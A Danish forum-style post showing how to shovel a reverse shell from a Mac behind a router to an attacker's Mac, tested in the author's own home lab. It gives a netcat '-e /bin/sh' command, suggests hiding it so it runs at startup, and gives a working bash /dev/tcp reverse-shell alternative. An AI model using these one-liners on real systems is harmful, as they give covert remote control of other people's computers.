Apple har fjernet -e optionen i netcat på OS X (jeg kender kun 10.3.9 og
10.4.11). Det er højst sandsynligt af sikkerhedsmæssige årsager. I mange
andre UNIX sytemer er den osse blevet fjernet. Det er lidt synd, fordi
mulighederne med netcat -e viser hvordan en "bagdør" virker gennem en
gateway/router.
Men jeg har fundet nedenstående opskrift på nettet og afprøvet den og
den virker osse. Den er lidt mer' bøvlet.
Ideen er, at du har en Mac, der kører OS X bag en router og en anden Mac
der osse køre OS X på ydersiden af din router. Opgaven er så, at
kontrollere den Mac der befinder sig bag routeren fra den Mac på
ydersiden.
Med netcat og optionen -e ville man gøre det på følgende måde.
Angriberen ydersiden starter netcat så den lytter på f,eks port 1234:
$ nc -l -p 1234
På den Mac, der skulle være "beskyttet" bag routeren kan angriberen
sørge for ved at liste det ind på computeren, at netcat kører skjult
hver gang den starter:
$ nc <angribers-adresse> 1234 -e /bin/sh
Nu ville angriberen så have kontrol over en terminal på den "beskyttede"
Mac, fordi den computer der lytter over forbindelsen er hans computer.
Metoden går under betegnelsen: shovelling a shell. Men den mulighed, med
"-e" er (nu - har den nogen sinde været der?) fjernet i OS X.
Jeg har fundet denne alternativ.
På den Mac bag routeren benytter angriberen istedet bash:
$ exec 5<>/dev/tcp/<angribers-adresse>/1234
$ cat <&5 | while read line; do $line 2>&5 >&5; done
Den metode har jeg afprøvet med opstilling nedenfor på mit LAN og det
virker udemærket.
: CC router/DHCP (ip 77.212.38.16/10.0.0.1)
: I
: switch <-> Mac-angr (ip 10.0.0.4)
: I
: Min router/DHCP (ip 10.0.0.2/192.168.10.1)
: I
: switch <-> Mac-hack (ip 192.168.10.100)
Jeg kunne se kataloger og mapper, og læse en fil, der lå på den
"hackede" Mac med vi editoren - gennem routeren.
Her er 2 screenshots:
http://users.cybercity.dk/~dsl487543/Mac-hack.png
http://users.cybercity.dk/~dsl487543/Mac-angr.png
--
.rotinom siht edisni deppart m'I !PLEH